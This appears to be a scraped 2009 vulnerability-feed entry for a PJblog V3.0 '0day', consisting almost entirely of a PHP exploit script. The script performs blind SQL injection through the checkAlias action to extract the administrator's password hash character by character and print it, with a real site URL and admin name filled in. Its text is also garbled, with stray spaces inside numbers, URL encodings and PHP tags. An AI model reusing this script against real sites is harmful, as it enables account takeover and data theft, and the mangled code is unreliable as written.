PJblog V3. 0 0day-vulnerability warning-the black bar safety net

2009-04-23T00:00:00
ID MYHACK58:62200923020
Type myhack58
Reporter 佚名
Modified 2009-04-23T00:00:00

Description

Original link:<http://www.0kee.com/read.php?tid-908.html> <? php / PJblog V3. 0 0day exp code by small Roach&bink www.0kee.com www.t00ls.net 09.04.22 /

$url="http://www.pjhome.net"; //inject the address $var_name="puterjam"; //administrator $var_key="check_right";

if ($_SESSION["LenI"]){ $LenI=$_SESSION["LenI"]; }else{ $LenI=1; } for($i=$LenI;$i<=4 0;$i++){ if($_SESSION["LenDo"]){ $StaAsc=$_SESSION["LenDo"]; }else{ $StaAsc=3 1; } echo "Scan password len:".$ i." ;asc form ".$ StaAsc." to 1 2 7"; for($j=$StaAsc;$j<=1 2 7;$j++){ $newurl=$url.'/ action. asp? action=checkAlias&cname=firebug_plugins_firediff"%20and%2 0%28select%20top%2 0 1%20asc%28mid%28mem_password%2c'.$ i.'% 2c1%2 9% 2 9%20From%20blog_member%20where%20mem_name=\".$ var_name.'\'% 2 9%3e'.$ j.'% 20and%2 0"1"="1'; $var_pagelen=file_get_contents($newurl); $var_newpagelen=strpos($var_pagelen,$var_key); if($var_newpagelen == true){ $_SESSION["tmpPassWord"]=$_SESSION["tmpPassWord"]. chr($j); unset($_SESSION["LenDo"]); $_SESSION["LenI"]=$i+1; doReload(); break; } if($j == $StaAsc+1 0){ doReload(); break; } } } if ($_SESSION["LenI"]==4 0 && ! ($_SESSION["LenDo"])){ echo $_SESSION["tmpPassWord"]; }

function doReload(){ ?& gt; <script language="javascript"> <!-- window. setTimeout('location. reload()',1 0 0 0); //--> </script> <? php } ?& gt;